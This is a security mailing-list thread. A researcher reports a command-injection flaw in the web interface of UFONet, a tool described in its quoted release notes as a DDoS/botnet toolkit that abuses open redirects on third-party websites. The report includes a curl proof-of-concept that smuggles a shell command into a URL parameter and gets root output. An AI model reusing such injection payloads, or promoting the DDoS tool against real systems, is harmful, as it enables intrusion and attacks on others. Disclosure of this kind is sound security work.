On 16/7/21 13:06, Pierre Kim wrote:
> Hi,
Hi UFOmmander!
> Attention to all motherships, borgs have been detected inside a
> blackhole. Brace yourself for the impact:
>
> $ curl
> "http://localhost:9999/cmd_download_botnet_ip?blackhole=';id>/tmp/plop;'"
> $ cat /tmp/plop
> uid=0(root) gid=0(root) groups=0(root)
>
> Energy shield levels critical! Enemies detected on the deck. Immediate
> response needed!
Hahahaha.... That teleportation technology can be exploited by many
alien races in the galaxy, yes, but it will depend a lot on the pilot
experiencies and in the environment in which the aircraft has been built.
Some use transparent proxies to avoid going further in those techniques...
"""
$ curl
"http://localhost:9999/cmd_download_botnet_ip?blackhole=';id>/tmp/plop;'"
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd";>
<html>
<head>
<title>503 - Forwarding failure (Privoxy@localhost)</title>
"""
Others simply do not launch the tool using the privileged user (root),
knowing that UFONet is designed to prompt you when required, for example
when creating certain network packages ...
> Can you request a CVE ?
Ahhaha, I don't think so...but, when to send the solution with the piece
of code already fixed?..
Ouch! {troll}
> Best regards,
Thank you very much for the report and for doing it in such a funny
tone... ;-)
> - Captain Alex Torres and Pilot Pierre Kim
Roger!. I will work on it!
> On 7/15/21, psy <epsylon@xxxxxxxxxx> wrote:
>> Hi Community,
>>
>> I am glad to present a new release of this tool:
>>
>> - https://ufonet.03c8.net
>>
>> ---------
>>
>> "UFONet is a free software, P2P and cryptographic -disruptive toolkit-
>> that allows to perform DoS and DDoS attacks; on the Layer 7 (APP/HTTP)
>> through the exploitation of Open Redirect vectors on third-party
>> websites to act as a botnet and on the Layer3 (Network) abusing the
>> protocol."
>>
>> "It also works as an encrypted DarkNET to publish and receive content by
>> creating a global client/server network."
>>
>> ---------
>>
>> Main options are:
>>
>> * DDoS (botnet) + DoS
>> * Auto-update
>> * Clean code
>> * Documentation with examples
>> * Web/GUI Interface
>> * Proxy to connect to 'zombies' (ex: tor)
>> * Change HTTP Headers (User-Agent, Referer, Host...)
>> * Configure requests (Timeout, Retries, Delay, Threads...)
>> * Search for 'zombies' on different search engines
>> * Test vulnerabilities on 'zombies'
>> * Download/Upload 'zombies' from/to others
>> * Inspect a target (HTML objects sizes)
>> * Set a place to 'bite' on a target (ex: big file)
>> * Control number of rounds to attack
>> * Apply cache evasion techniques
>> * Advanced queries (ex: Verb tunneling exploitation)
>> * Supports GET/POST
>> * Multithreading
>> * Order 'zombies' to attack you for benchmarking
>> * Geomapping / Visual data
>> * [...]
>>
>> This release (v1.7) called "/KRäK!eN/" has added this new features:
>>
>> * Bugfixing
>> * Added: "Deploy"
>> * Added: "SHIP.TV"
>> * Added: "Nodes"
>> * Modified/Updated: Web/GUI
>> * Updated Documentation
>> * Updated FAQ (offline/online)
>> * Updated Website
>> * [...]
>>
>> ---------
>>
>> FAQ:
>>
>> - https://ufonet.03c8.net/FAQ.html
>>
>> ---------
>>
>> Packages:
>>
>> * [source]:
>>
>> - https://code.03c8.net/epsylon/ufonet
>>
>> * [mirror]:
>>
>> - https://github.com/epsylon/ufonet
>>
>> * [.zip]:
>>
>> - https://ufonet.03c8.net/ufonet/ufonet-v1.7.zip
>>
>> * [.tar.gz]:
>>
>> - https://ufonet.03c8.net/ufonet/ufonet-v1.7.tar.gz
>>
>> -------------------------
>>
>> MEDIA:
>>
>> * [Video] [07.2021] UFONet - "/KRäK!eN/":
>>
>> - https://ufonet.03c8.net/ufonet/ufonet-kraken.ogv
>>
>
>
Attachment:
0xE79A8B84B2460A20.asc
Description: application/pgp-keys
Attachment:
signature.asc
Description: OpenPGP digital signature
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/